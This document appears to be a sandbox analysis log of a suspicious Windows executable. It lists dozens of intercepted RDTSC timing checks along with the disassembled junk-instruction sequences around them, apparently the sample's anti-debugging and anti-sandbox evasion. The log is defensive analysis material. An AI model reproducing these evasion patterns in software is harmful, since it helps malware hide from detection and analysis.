Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FDEB second address: C1FDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FEB5 second address: C1FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FF67 second address: C1FF9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F1CC8BB7C4Bh 0x00000013 jmp 00007F1CC8BB7C45h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2021B second address: C2021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2021F second address: C20225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20225 second address: C2022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2022B second address: C2022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2022F second address: C2027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000004h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F1CC8B8C9E8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push edi 0x00000026 call 00007F1CC8B8C9F4h 0x0000002b sbb dx, 4E8Fh 0x00000030 pop edx 0x00000031 pop edx 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2027D second address: C20281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20281 second address: C20287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20AC9 second address: C20AD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C20AD3 second address: C20AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAA2 second address: C4AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F1CC8BB7C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAAC second address: C4AAEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007F1CC8B8C9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F1CC8B8C9EEh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jc 00007F1CC8B8C9E6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1CC8B8C9F4h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1CC8B8C9ECh 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAEE second address: C4AAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AAF2 second address: C4AAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4AF4A second address: C4AF64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1CC8BB7C40h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4B544 second address: C4B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C50FF5 second address: C50FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C50FF9 second address: C5103C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F1CC8B8C9F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F1CC8B8C9F2h 0x00000011 pushad 0x00000012 jp 00007F1CC8B8C9EEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5103C second address: C5104B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CC8BB7C36h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5104B second address: C5104F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FDCA second address: C4FDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FF5E second address: C4FF63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FACD second address: C4FAD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4FAD7 second address: C4FAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F2h 0x00000009 jg 00007F1CC8B8C9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C585A9 second address: C585C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C43h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5746E second address: C5747F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F1CC8B8C9E6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5772B second address: C57738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CC8BB7C3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C57877 second address: C5789A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8B8C9E6h 0x00000008 jmp 00007F1CC8B8C9F9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5789A second address: C578D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CC8BB7C4Eh 0x00000008 je 00007F1CC8BB7C36h 0x0000000e jmp 00007F1CC8BB7C42h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1CC8BB7C3Dh 0x0000001c jmp 00007F1CC8BB7C3Bh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C57CEF second address: C57D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1CC8B8C9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F0h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C57D0F second address: C57D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C58402 second address: C58408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C58408 second address: C5840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5B618 second address: C5B631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F1CC8B8C9ECh 0x0000000d jng 00007F1CC8B8C9E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C5B631 second address: C5B635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C613D7 second address: C613E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C636F7 second address: C6371E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C3Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C69232 second address: C69236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C69236 second address: C6923C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C693A5 second address: C693A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C693A9 second address: C693B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B56F second address: C6B57A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B57A second address: C6B586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1CC8BB7C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B586 second address: C6B58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6B58B second address: C6B59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E573 second address: C6E57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E57E second address: C6E584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E584 second address: C6E5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E5A0 second address: C6E5D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8BB7C43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6DD11 second address: C6DD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F1CC8B8C9F6h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C6E01D second address: C6E034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F1CC8BB7C38h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F1CC8BB7C36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C73E87 second address: C73E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C73E8B second address: C73E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72C8C second address: C72CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1CC8B8C9EFh 0x0000000a jmp 00007F1CC8B8C9F9h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72CC6 second address: C72CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72E33 second address: C72E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72F8A second address: C72F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CC8BB7C36h 0x0000000a jns 00007F1CC8BB7C36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72F9C second address: C72FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72FA1 second address: C72FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C72FC0 second address: C72FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C204A6 second address: C20515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F1CC8BB7C38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edi, edx 0x00000026 push edx 0x00000027 mov dword ptr [ebp+122D2F06h], esi 0x0000002d pop ecx 0x0000002e push 00000004h 0x00000030 ja 00007F1CC8BB7C49h 0x00000036 nop 0x00000037 pushad 0x00000038 push ecx 0x00000039 push eax 0x0000003a pop eax 0x0000003b pop ecx 0x0000003c pushad 0x0000003d jmp 00007F1CC8BB7C45h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C760EF second address: C760F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C760F3 second address: C76108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D886 second address: C7D8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8B8C9ECh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7B7C3 second address: C7B7D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7B7D1 second address: C7B7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7B7E7 second address: C7B806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C45h 0x00000009 popad 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BA99 second address: C7BAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F1CC8B8C9E6h 0x00000010 jnl 00007F1CC8B8C9E6h 0x00000016 popad 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BAB6 second address: C7BAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BAC0 second address: C7BAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD3D second address: C7BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD43 second address: C7BD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD48 second address: C7BD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7BD5D second address: C7BD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CC8B8C9F1h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7C98D second address: C7C991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D003 second address: C7D007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D007 second address: C7D00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C7D5D5 second address: C7D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C83091 second address: C83095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C83095 second address: C830A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F1CC8B8C9E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C830A7 second address: C830AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C830AD second address: C830B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870B7 second address: C870C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870C3 second address: C870CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870CB second address: C870CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870CF second address: C870E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C870E0 second address: C8710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8BB7C47h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C86255 second address: C86267 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1CC8B8C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
